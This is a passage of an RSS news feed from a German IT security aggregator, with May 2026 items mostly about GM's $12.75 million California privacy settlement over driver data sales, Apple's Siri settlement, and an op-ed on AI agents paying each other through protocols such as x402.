<content:encoded><![CDATA[As of May 12, the claims process for Apple's proposed Siri settlement over delayed Apple Intelligence features has not opened yet. Here's what you need to know about the process, what to watch out for, and how to check eligibility.<br><br><div><img src="https://photos5.appleinsider.com/gallery/61141-126178-Width-Comparison-xl.jpg" alt="Two smartphones, one silver and one graphite, standing vertically side-by-side on a table with a blurred colorful background." height="738"><br><span>iPhone 16 and iPhone 16 Pro both qualify for delayed Apple Intelligence feature rollout payments</span></div><br>Court filings in <em>Landsheft v. Apple Inc.</em> lay out who may qualify, which iPhone models are covered, what information users may need, and when an official claims process could begin. The proposed settlement covers certain U.S. buyers of iPhone 15 Pro and iPhone 16 models who purchased eligible devices between June 10, 2024 and March 29, 2025.<br><br>The settlement proposes a $25 payment per eligible device, though the final amount may rise or fall based on the number of approved claims. Payments are capped at $95 per device.<br><br><br> <a href="https://appleinsider.com/inside/iphone-16/tips/how-to-check-whether-your-iphone-qualifies-for-apple-intelligence-settlement-money?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244317?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[General Motors to pay $12.75 million over driver data sales]]></title>
<description><![CDATA[General Motors has agreed to a $12.75 million settlement with California over allegations that it unlawfully sold drivers’ location and behavioral data to brokers, marking the largest penalty in the history of the state’s Consumer Privacy Act. Prosecutors say GM…
Read more →
The post General Moto...]]></description>
<link>https://tsecurity.de/de/3510583/it-security-nachrichten/general-motors-to-pay-1275-million-over-driver-data-sales/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3510583/it-security-nachrichten/general-motors-to-pay-1275-million-over-driver-data-sales/</guid>
<pubDate>Tue, 12 May 2026 16:09:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>General Motors has agreed to a $12.75 million settlement with California over allegations that it unlawfully sold drivers’ location and behavioral data to brokers, marking the largest penalty in the history of the state’s Consumer Privacy Act. Prosecutors say GM…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/general-motors-to-pay-12-75-million-over-driver-data-sales/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/general-motors-to-pay-12-75-million-over-driver-data-sales/">General Motors to pay $12.75 million over driver data sales</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[General Motors to pay $12.75 million over driver data sales]]></title>
<description><![CDATA[General Motors has agreed to a $12.75 million settlement with California over allegations that it unlawfully sold drivers’ location and behavioral data to brokers, marking the largest penalty in the history of the state’s Consumer Privacy Act. Prosecutors say GM made approximately $20 million nat...]]></description>
<link>https://tsecurity.de/de/3510540/it-security-nachrichten/general-motors-to-pay-1275-million-over-driver-data-sales/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3510540/it-security-nachrichten/general-motors-to-pay-1275-million-over-driver-data-sales/</guid>
<pubDate>Tue, 12 May 2026 15:53:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>General Motors has agreed to a $12.75 million settlement with California over allegations that it unlawfully sold drivers’ location and behavioral data to brokers, marking the largest penalty in the history of the state’s Consumer Privacy Act. Prosecutors say GM made approximately $20 million nationwide from the sales. “General Motors sold the data of California drivers without their knowledge or consent and despite numerous statements reassuring drivers that it would not do so. This trove … <a href="https://www.helpnetsecurity.com/2026/05/12/general-motors-location-data-sale-12-75-million-settlement/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/05/12/general-motors-location-data-sale-12-75-million-settlement/">General Motors to pay $12.75 million over driver data sales</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Machine payments: When agents start paying agents]]></title>
<description><![CDATA[Most conversations about AI and payments focus on agents shopping for people — ordering groceries, booking flights, comparing prices. But there’s a less visible and larger shift happening underneath: AI agents paying other AI agents directly. Not on behalf of a consumer. As part of their own work...]]></description>
<link>https://tsecurity.de/de/3509594/it-security-nachrichten/machine-payments-when-agents-start-paying-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3509594/it-security-nachrichten/machine-payments-when-agents-start-paying-agents/</guid>
<pubDate>Tue, 12 May 2026 11:10:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Most conversations about AI and payments focus on agents shopping for people — ordering groceries, booking flights, comparing prices. But there’s a less visible and larger shift happening underneath: AI agents paying other AI agents directly. Not on behalf of a consumer. As part of their own workflows. When one agent needs data, compute or another agent’s capabilities, it pays for access in milliseconds. No human involved on either side.</p>



<h2 class="wp-block-heading"> What are ‘machine payments,’ exactly?</h2>



<p>There’s an important distinction between agentic commerce and machine payments. In agentic commerce, a human is always the principal — the agent acts as a delegate, buying something a person wants. In machine payments, the transaction may be entirely between software systems pursuing goals that no human initiated in the moment.</p>



<p>The examples are concrete and multiplying. An AI agent spins up additional cloud compute when it hits a bottleneck and pays per inference. A research agent purchases a real-time data feed to complete an analysis. One model pays another for a specialized capability it lacks. API services price per call and settle automatically, with no invoicing cycle and no procurement department.</p>



<p>What makes this possible is that AI agents have none of the friction that has historically made small payments impractical. They have no attention limits, no tolerance for multi-step onboarding, no hesitation around spending two cents. The transacting entity is software — running autonomously, operating around the clock — and the entire payment architecture needs to match that. Agents are the customer type that micropayment infrastructure was always designed for. They just weren’t the customer anyone expected.</p>



<h2 class="wp-block-heading">Why existing payment rails don’t fit</h2>



<p>Traditional banking was built for humans. Account creation assumes identity documents. Authentication assumes physical presence. Settlement takes hours or days. And the minimum transaction economics of card networks — roughly thirty cents plus 2.9 percent per transaction — make a two-cent payment structurally impossible. The infrastructure and the use case are simply mismatched.</p>



<p>What agents need is instant settlement, fractional-cent transactions, programmatic authorization and the ability to establish payment relationships entirely in code.</p>



<h2 class="wp-block-heading">What’s being built</h2>



<p>Two protocols are leading the early infrastructure, representing complementary approaches.</p>



<p><a href="https://url.usb.m.mimecastprotect.com/s/Gpj4CvmMjMu04nn7TXh4TQdDC5?domain=stripe.com" target="_blank" rel="nofollow">Stripe’s Machine Payments Protocol</a>, or MPP, is an open standard co-authored with Tempo that gives agents an internet-native way to pay. An agent requests a resource from any HTTP endpoint. The service responds with a payment request. The agent authorizes and receives the resource — all programmatically. MPP supports both stablecoin and fiat settlement, which makes it practical for businesses already running on traditional payment rails; the same Stripe API that handles human transactions can handle machine ones. The design goal is programmable spend authorization: not just access to a resource, but a verifiable, scoped permission to pay for it.</p>



<p>The <a href="https://url.usb.m.mimecastprotect.com/s/SxanCwnNkNsZPEEGt9ijTJtC1u?domain=x402.org" target="_blank" rel="nofollow">x402 protocol</a>, developed by Coinbase as an open standard, takes a different approach: it revives the HTTP 402 “Payment Required” status code that has sat dormant in the web’s architecture since the 1990s. An agent requests a resource, receives a 402 response with payment instructions, pays instantly in stablecoins and gains access — one line of code on the server side. <a href="https://url.usb.m.mimecastprotect.com/s/tzUZCxo0l0UqB551fws0TywZAg?domain=coinbase.com" target="_blank" rel="nofollow">According to Coinbase</a>, the protocol has already processed over 50 million transactions. Where MPP is optimized for businesses that want fiat compatibility and Stripe’s existing settlement infrastructure, x402 is optimized for stablecoin-native deployments that need the lightest possible integration path.</p>



<p>To make this concrete: imagine a research agent that needs to read a paywalled New York Times article to complete its task. Today, that’s a dead end — no account, no subscription, no way to pay. With x402, the Times publishes a per-article price to its API endpoint. The agent hits the endpoint, receives a 402 response with a stablecoin payment address and a price of, say, $0.25, pays in milliseconds, and receives the article. No login, no subscription tier, no checkout flow. The transaction settles in fractions of a cent of fees. For publishers that have spent a decade wrestling with paywalls and ad revenue erosion, this is a different kind of business model — one where the reader might be software.</p>



<p>Stablecoins are emerging as the natural settlement layer for both protocols. They’re programmable, instant, fractional, borderless and operate continuously — matching how software works, not how banks do. In 2025, <a href="https://url.usb.m.mimecastprotect.com/s/QBRgCyp4m4hmJPPrfNtPTxfTPf?domain=visserlabs.substack.com" target="_blank" rel="nofollow">stablecoin transaction volume reached roughly $33 trillion, rivaling Visa and Mastercard combined</a>.</p>



<h2 class="wp-block-heading">Why this matters beyond tech</h2>



<p>Machine payments unlock business models that weren’t previously viable at scale. Content priced per article rather than per subscription. APIs charged per call rather than per tier. AI services billed per task rather than per seat. The practical implication is that every API endpoint becomes a potential product with real-time pricing — and the buyer doesn’t need to be a human with a credit card and a billing department. A research firm could expose its proprietary dataset to agents at $0.001 per query and run a meaningful revenue line without a single sales conversation. A specialized AI model could charge other models for its capabilities on every invocation. The economics of building and selling software change when the purchasing friction drops to nearly zero.</p>



<h2 class="wp-block-heading">The execution question</h2>



<p>The protocols define how machine payments are initiated and authorized. What they don’t solve is what happens when something goes wrong — and in fully automated, high-frequency agent workflows, things will go wrong. An agent that misfires a payment with no human in the loop, no dispute path and no audit trail is a different category of problem than a failed human transaction. The infrastructure needs to guarantee that a failed mid-sequence payment doesn’t result in double charges or resources delivered without authorization; that every transaction is logged in a form that supports accountability; and that agents operating across multiple systems can manage payment credentials without exposing them. That execution layer — the substrate that makes machine payments reliable enough to trust at scale — is still being built. The protocols are ahead of it.</p>



<h2 class="wp-block-heading">Where this is heading</h2>



<p>Machine payments aren’t a future trend being modeled on spreadsheets. The protocols exist. Transactions are happening at scale. What’s still missing is recognition that this represents a genuinely new category of economic actor — not a faster version of human payments, but something structurally different. When the majority of internet transactions don’t involve a human on either side, the frameworks for trust, reliability and accountability have to be rebuilt from the ground up. The companies and developers who understand that now, while the architecture is still being designed, will have shaped it. Everyone else will inherit whatever they built.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android Owners: You Could Get Part of Google's $135 Million Data Settlement]]></title>
<description><![CDATA[Did you use an Android phone with a mobile service plan in the last nine years? You could receive up to $100.]]></description>
<link>https://tsecurity.de/de/3508752/it-nachrichten/android-owners-you-could-get-part-of-googles-135-million-data-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3508752/it-nachrichten/android-owners-you-could-get-part-of-googles-135-million-data-settlement/</guid>
<pubDate>Tue, 12 May 2026 03:47:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Did you use an Android phone with a mobile service plan in the last nine years? You could receive up to $100.]]></content:encoded>
</item>
<item>
<title><![CDATA[GM agrees to $12.75M California settlement over sale of drivers’ data]]></title>
<description><![CDATA[California Attorney General Rob Bonta announced a proposed $12.75 million settlement agreement with General Motors (GM) over allegations that the company violated the California Consumer Privacy Act (CCPA). [...]]]></description>
<link>https://tsecurity.de/de/3508538/it-security-nachrichten/gm-agrees-to-1275m-california-settlement-over-sale-of-drivers-data/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3508538/it-security-nachrichten/gm-agrees-to-1275m-california-settlement-over-sale-of-drivers-data/</guid>
<pubDate>Tue, 12 May 2026 00:53:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[California Attorney General Rob Bonta announced a proposed $12.75 million settlement agreement with General Motors (GM) over allegations that the company violated the California Consumer Privacy Act (CCPA). [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[California hits GM with record $12.75M fine for selling driver location data]]></title>
<description><![CDATA[California Attorney General Rob Bonta and a coalition of state prosecutors have secured a $12.75 million settlement with General Motors over the automaker’s collection and sale of drivers’ location and behavior data. This marks the largest California Consumer Privacy Act (CCPA) penalty to date an...]]></description>
<link>https://tsecurity.de/de/3508236/it-security-nachrichten/california-hits-gm-with-record-1275m-fine-for-selling-driver-location-data/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3508236/it-security-nachrichten/california-hits-gm-with-record-1275m-fine-for-selling-driver-location-data/</guid>
<pubDate>Mon, 11 May 2026 21:39:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>California Attorney General Rob Bonta and a coalition of state prosecutors have secured a $12.75 million settlement with General Motors over the automaker’s collection and sale of drivers’ location and behavior data. This marks the largest California Consumer Privacy Act (CCPA) penalty to date and the state’s first enforcement action centered on data minimization violations. …</p>
<p>The post <a href="https://cyberinsider.com/california-hits-gm-with-record-12-75m-fine-for-selling-driver-location-data/">California hits GM with record $12.75M fine for selling driver location data</a> appeared first on <a href="https://cyberinsider.com/">CyberInsider</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GM settles California lawsuit claiming it sold driving habit data to insurance companies]]></title>
<description><![CDATA[General Motors has agreed to pay $12.75 million to settle a California data privacy lawsuit that accused the automaker of selling driver location and driver data, as reported earlier by Reuters. In a proposed settlement filed on Friday, GM agreed to stop selling customer information to data broke...]]></description>
<link>https://tsecurity.de/de/3507516/it-nachrichten/gm-settles-california-lawsuit-claiming-it-sold-driving-habit-data-to-insurance-companies/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3507516/it-nachrichten/gm-settles-california-lawsuit-claiming-it-sold-driving-habit-data-to-insurance-companies/</guid>
<pubDate>Mon, 11 May 2026 17:19:03 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[General Motors has agreed to pay $12.75 million to settle a California data privacy lawsuit that accused the automaker of selling driver location and driver data, as reported earlier by Reuters. In a proposed settlement filed on Friday, GM agreed to stop selling customer information to data brokers for five years and must give California […]]]></content:encoded>
</item>
<item>
<title><![CDATA[California Hits General Motors With Record $12.75 Million CCPA Privacy Settlement]]></title>
<description><![CDATA[California Attorney General Rob Bonta and a coalition of state and local enforcement agencies have announced a $12.75 million settlement with General Motors over allegations that the automaker illegally collected and sold drivers’ personal data without proper consent, in violation of the Californ...]]></description>
<link>https://tsecurity.de/de/3505902/it-security-nachrichten/california-hits-general-motors-with-record-1275-million-ccpa-privacy-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3505902/it-security-nachrichten/california-hits-general-motors-with-record-1275-million-ccpa-privacy-settlement/</guid>
<pubDate>Mon, 11 May 2026 07:53:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1376" height="768" src="https://thecyberexpress.com/wp-content/uploads/California-Privacy-Settlement.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="California Privacy Settlement" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/California-Privacy-Settlement.webp 1376w, https://thecyberexpress.com/wp-content/uploads/California-Privacy-Settlement-300x167.webp 300w, https://thecyberexpress.com/wp-content/uploads/California-Privacy-Settlement-1024x572.webp 1024w, https://thecyberexpress.com/wp-content/uploads/California-Privacy-Settlement-768x429.webp 768w, https://thecyberexpress.com/wp-content/uploads/California-Privacy-Settlement-600x335.webp 600w, https://thecyberexpress.com/wp-content/uploads/California-Privacy-Settlement-150x84.webp 150w, https://thecyberexpress.com/wp-content/uploads/California-Privacy-Settlement-750x419.webp 750w, https://thecyberexpress.com/wp-content/uploads/California-Privacy-Settlement-1140x636.webp 1140w, https://thecyberexpress.com/wp-content/uploads/California-Privacy-Settlement.webp 1376w, https://thecyberexpress.com/wp-content/uploads/California-Privacy-Settlement-300x167.webp 300w, https://thecyberexpress.com/wp-content/uploads/California-Privacy-Settlement-1024x572.webp 1024w, https://thecyberexpress.com/wp-content/uploads/California-Privacy-Settlement-768x429.webp 768w, https://thecyberexpress.com/wp-content/uploads/California-Privacy-Settlement-600x335.webp 600w, https://thecyberexpress.com/wp-content/uploads/California-Privacy-Settlement-150x84.webp 150w, https://thecyberexpress.com/wp-content/uploads/California-Privacy-Settlement-750x419.webp 750w, https://thecyberexpress.com/wp-content/uploads/California-Privacy-Settlement-1140x636.webp 1140w" sizes="(max-width: 1376px) 100vw, 1376px" title="California Hits General Motors With Record $12.75 Million CCPA Privacy Settlement 1"></p>California Attorney General Rob Bonta and a coalition of state and local enforcement agencies have announced a $12.75 million settlement with General Motors over allegations that the automaker illegally collected and sold drivers’ personal data without proper consent, in violation of the <a href="https://thecyberexpress.com/california-france-data-privacy-protections/" target="_blank" rel="noopener">California Consumer Privacy Act</a> (CCPA). The California privacy settlement marks the largest CCPA penalty in California history so far and represents the state’s first enforcement action focused on data minimization requirements under California privacy law.

The case centers on allegations that General Motors shared sensitive driver information, including geolocation data and driving behavior, with data brokers Verisk Analytics and LexisNexis Risk Solutions between 2020 and 2024.
<h2>California Privacy Settlement Targets Driver Data Sales</h2>
According to the complaint, GM collected <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28191">data</a> through its OnStar connected vehicle platform, which offers emergency assistance, navigation, and crash response services. Investigators alleged that the company sold names, contact details, precise location information, and driving behavior data of hundreds of thousands of Californians to the two data brokers.

Authorities said the data was intended to help create driver-risk scoring products that could be used by insurance companies when setting premiums.

The investigation was conducted jointly by the California Department of Justice, the California <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-privacy/" title="Privacy" data-wpil-keyword-link="linked" data-wpil-monitor-id="28193">Privacy</a> Protection Agency (CalPrivacy), and district attorneys from San Francisco, Los Angeles, Napa, and Sonoma counties.

Attorney General Rob Bonta <a href="https://privacy.ca.gov/2026/05/when-it-comes-to-data-privacy-consumers-must-be-in-the-drivers-seat-attorney-general-bonta-partners-secure-12-75-million-general-motors-privacy-settlement/" target="_blank" rel="nofollow noopener">said</a> the settlement sends a clear message about consumer control over personal data.

“General Motors sold the data of California drivers without their knowledge or consent,” Bonta said in the <a class="wpil_keyword_link" href="https://cyble.com/announcement/" target="_blank" rel="noopener" title="announcement" data-wpil-keyword-link="linked" data-wpil-monitor-id="28192">announcement</a>, adding that the data could reveal sensitive details about consumers’ daily routines and movements.
<h2>CCPA Violations and Data Minimization Concerns</h2>
A major part of the case focused on alleged violations of the CCPA’s data minimization and purpose limitation requirements, which were added to California law in 2023.

Under these provisions, companies are required to collect and retain only the data necessary for a disclosed purpose. Investigators alleged that GM retained driving and location data long after it was needed to operate OnStar services and later sold that retained data to third parties.

Authorities also alleged that GM failed to clearly inform consumers about how their information would be used. The complaint stated that GM’s privacy policies suggested driver data would only be used to provide requested OnStar services and even claimed the company did not sell driving or location information.

Investigators said the company’s practices contradicted those statements.

San Francisco District Attorney Brooke Jenkins described modern vehicles as “rolling data collection machines” and said consumers deserve transparency about what information is collected and how it is shared.

Los Angeles County District Attorney Nathan J. Hochman said companies handling consumer data would be held accountable under California privacy laws, regardless of their size.
<h2>Connected Vehicle Privacy Under Scrutiny</h2>
The settlement follows growing regulatory scrutiny around connected vehicle privacy and automotive data collection practices.

In 2023, CalPrivacy launched investigations into connected car manufacturers and their handling of consumer information. Public attention increased further in 2024 after a report by The New York Times highlighted how automakers were sharing driving behavior data with insurance companies. The reporting indicated that some consumers outside California had experienced increased insurance premiums tied to such data-sharing practices.

California investigators later determined that California drivers were likely not directly affected through insurance rate increases because state insurance laws prohibit insurers from using driving behavior data to set premiums.

However, regulators maintained that the collection, retention, and sale of the data itself violated California privacy requirements.
<h2>Settlement Terms for General Motors</h2>
Under the proposed California privacy settlement, <a class="wpil_keyword_link" href="https://cyble.com/general/" target="_blank" rel="noopener" title="General" data-wpil-keyword-link="linked" data-wpil-monitor-id="28190">General</a> Motors must implement several privacy-related measures over the coming years.

The company will be required to:
<ul>
 	<li>Pay $12.75 million in civil penalties.</li>
 	<li>Stop selling driving data to consumer reporting agencies for five years.</li>
 	<li>Delete retained driving data within 180 days unless consumers provide express consent for limited uses.</li>
 	<li>Request the deletion of driver data already shared with LexisNexis and Verisk.</li>
 	<li>Establish and maintain a comprehensive privacy compliance program.</li>
 	<li>Submit privacy assessments and compliance reports to California regulators and prosecutors.</li>
</ul>
The settlement also reinforces California’s broader push to strengthen consumer control over personal information under the CCPA.

CalPrivacy Executive Director Tom Kemp said California privacy laws require businesses to collect only the information they genuinely need and to be transparent about how that data is handled.

Alongside the settlement announcement, regulators also highlighted the state’s Delete Request and Opt-out Platform (DROP), which allows Californians to submit requests to delete personal information held by hundreds of registered data brokers.]]></content:encoded>
</item>
<item>
<title><![CDATA[Canvas Breach Exposes 275M Accounts | AI Targets Water Systems | GM OnStar Settlement]]></title>
<description><![CDATA[A massive cybersecurity week. On this episode of Cybersecurity Today, David Shipley breaks down the reported breach of Instructure’s Canvas learning platform, where attacks linked to the ShinyHunters extortion group may have exposed data tied to up to 275 million…
Read more →
The post Canvas Brea...]]></description>
<link>https://tsecurity.de/de/3505766/it-security-nachrichten/canvas-breach-exposes-275m-accounts-ai-targets-water-systems-gm-onstar-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3505766/it-security-nachrichten/canvas-breach-exposes-275m-accounts-ai-targets-water-systems-gm-onstar-settlement/</guid>
<pubDate>Mon, 11 May 2026 06:36:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A massive cybersecurity week. On this episode of Cybersecurity Today, David Shipley breaks down the reported breach of Instructure’s Canvas learning platform, where attacks linked to the ShinyHunters extortion group may have exposed data tied to up to 275 million…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/canvas-breach-exposes-275m-accounts-ai-targets-water-systems-gm-onstar-settlement/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/canvas-breach-exposes-275m-accounts-ai-targets-water-systems-gm-onstar-settlement/">Canvas Breach Exposes 275M Accounts | AI Targets Water Systems | GM OnStar Settlement</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GM Secretly Sold California Drivers' Data, Agrees to Pay $12.75M In Privacy Settlement]]></title>
<description><![CDATA["General Motors sold the data of California drivers without their knowledge or consent," says California's attorney general, "and despite numerous statements reassuring drivers that it would not do so." 


In 2024, The New York Times "reported that automakers including GM were sharing information...]]></description>
<link>https://tsecurity.de/de/3505186/it-security-nachrichten/gm-secretly-sold-california-drivers-data-agrees-to-pay-1275m-in-privacy-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3505186/it-security-nachrichten/gm-secretly-sold-california-drivers-data-agrees-to-pay-1275m-in-privacy-settlement/</guid>
<pubDate>Sun, 10 May 2026 20:53:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["General Motors sold the data of California drivers without their knowledge or consent," says California's attorney general, "and despite numerous statements reassuring drivers that it would not do so." 


In 2024, The New York Times "reported that automakers including GM were sharing information about their customers' driving behavior with insurance companies," remembers TechCrunch, "and that some customers were concerned that their insurance rates had gone up as a result." 

Now General Motors "has reached a privacy-related settlement with a group of law enforcement agencies led by California Attorney General Rob Bonta..."

The settlement announcement from Bonta's office similarly alleges that GM sold "the names, contact information, geolocation data, and driving behavior data of hundreds of thousands of Californians" to Verisk Analytics and LexisNexis Risk Solutions, which are both data brokers. Bonta's office further alleges that this data was collected through GM's OnStar program, and that the company made roughly $20 million from data sales. 

However, Bonta's office also said the data did not lead to increased insurance prices in California, "likely because under California's insurance laws, insurers are prohibited from using driving data to set insurance rates."
As part of the settlement, GM has agreed to pay $12.75 million in civil penalties and to stop selling driving data to any consumer reporting agencies for five years, Bonta's office said. GM has also agreed to delete any driver data that it still retains within 180 days (unless it obtains consent from customers), and to request that Lexis and Verisk delete that data.
 
"This trove of information included precise and personal location data that could identify the everyday habits and movements of Californians," according to the attorney general's announcement. The settlement "requires General Motors to abandon these illegal practices, and underscores the importance of the data minimization in California's privacy law — companies can't just hold on to data and use it later for another purpose." 

"Modern cars are rolling data collection machines," said San Francisco District Attorney Brooke Jenkins. "Californians must have confidence that they know what data is being collected, how it is being used, and what their opt-out rights are... This case sends a strong message that law enforcement will take action when California privacy laws are not scrupulously followed."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=GM+Secretly+Sold+California+Drivers'+Data%2C+Agrees+to+Pay+%2412.75M+In+Privacy+Settlement%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F05%2F10%2F1833256%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F05%2F10%2F1833256%2Fgm-secretly-sold-california-drivers-data-agrees-to-pay-1275m-in-privacy-settlement%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/05/10/1833256/gm-secretly-sold-california-drivers-data-agrees-to-pay-1275m-in-privacy-settlement?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GM agrees to pay $12.75M in California driver privacy settlement]]></title>
<description><![CDATA[General Motors has reached a privacy-related settlement with a group of law enforcement agencies led by California Attorney General Rob Bonta.]]></description>
<link>https://tsecurity.de/de/3503571/it-nachrichten/gm-agrees-to-pay-1275m-in-california-driver-privacy-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3503571/it-nachrichten/gm-agrees-to-pay-1275m-in-california-driver-privacy-settlement/</guid>
<pubDate>Sat, 09 May 2026 21:18:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[General Motors has reached a privacy-related settlement with a group of law enforcement agencies led by California Attorney General Rob Bonta.]]></content:encoded>
</item>
<item>
<title><![CDATA[Cash in on Siri’s stupidity [Cult of Mac podcast No. 19]]]></title>
<description><![CDATA[This week on the Cult of Mac podcast: Apple's failure to deliver Siri's AI upgrade costs the company $250 million. Get your slice of the pie!
(via Cult of Mac - Your source for the latest Apple news, rumors, analysis, reviews, how-tos and deals.)]]></description>
<link>https://tsecurity.de/de/3503481/ios-mac-os/cash-in-on-siris-stupidity-cult-of-mac-podcast-no-19/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3503481/ios-mac-os/cash-in-on-siris-stupidity-cult-of-mac-podcast-no-19/</guid>
<pubDate>Sat, 09 May 2026 19:41:19 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><img width="780" height="439" src="https://www.cultofmac.com/wp-content/uploads/2026/05/Siri-settlement-Cult-of-Mac-podcast-19-1440x810.jpg.webp" class="attachment-large size-large wp-post-image" alt="Photo of an iPhone with Siri running" decoding="async" fetchpriority="high" srcset="https://www.cultofmac.com/wp-content/uploads/2026/05/Siri-settlement-Cult-of-Mac-podcast-19-1440x810.jpg.webp 1440w, https://www.cultofmac.com/wp-content/uploads/2026/05/Siri-settlement-Cult-of-Mac-podcast-19-400x225.jpg 400w, https://www.cultofmac.com/wp-content/uploads/2026/05/Siri-settlement-Cult-of-Mac-podcast-19-768x432@2x.jpg.webp 1536w, https://www.cultofmac.com/wp-content/uploads/2026/05/Siri-settlement-Cult-of-Mac-podcast-19-2048x1152.jpg 2048w, https://www.cultofmac.com/wp-content/uploads/2026/05/Siri-settlement-Cult-of-Mac-podcast-19-350x197.jpg 350w, https://www.cultofmac.com/wp-content/uploads/2026/05/Siri-settlement-Cult-of-Mac-podcast-19-768x432.jpg.webp 768w, https://www.cultofmac.com/wp-content/uploads/2026/05/Siri-settlement-Cult-of-Mac-podcast-19-1020x574.jpg.webp 1020w, https://www.cultofmac.com/wp-content/uploads/2026/05/Siri-settlement-Cult-of-Mac-podcast-19-2040x1148.jpg.webp 2040w, https://www.cultofmac.com/wp-content/uploads/2026/05/Siri-settlement-Cult-of-Mac-podcast-19-400x225@2x.jpg 800w" sizes="(max-width: 780px) 100vw, 780px"></div>
<p>This week on the Cult of Mac podcast: Apple's failure to deliver Siri's AI upgrade costs the company $250 million. Get your slice of the pie!</p>
<p>(via <a href="https://www.cultofmac.com/">Cult of Mac - Your source for the latest Apple news, rumors, analysis, reviews, how-tos and deals.</a>)</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Life in Canberra]]></title>
<description><![CDATA[… is very pleasant. Last night, I went out to dinner with a bunch of OzLabs guys. We went to a Thai restaurant, and had a very nice meal, for $15 dollars — Australian! — each. It was a very reasonable price in U.S. dollars, but with the exchange being 2 for 1, at $7.50 USD, it was an absolute ste...]]></description>
<link>https://tsecurity.de/de/3501147/unix-server/life-in-canberra/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501147/unix-server/life-in-canberra/</guid>
<pubDate>Fri, 08 May 2026 23:04:51 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>… is very pleasant. Last night, I went out to dinner with a bunch of OzLabs guys. We went to a Thai restaurant, and had a very nice meal, for $15 dollars — Australian! — each. It was a very reasonable price in U.S. dollars, but with the exchange being 2 for 1, at $7.50 USD, it was an absolute steal.</p>
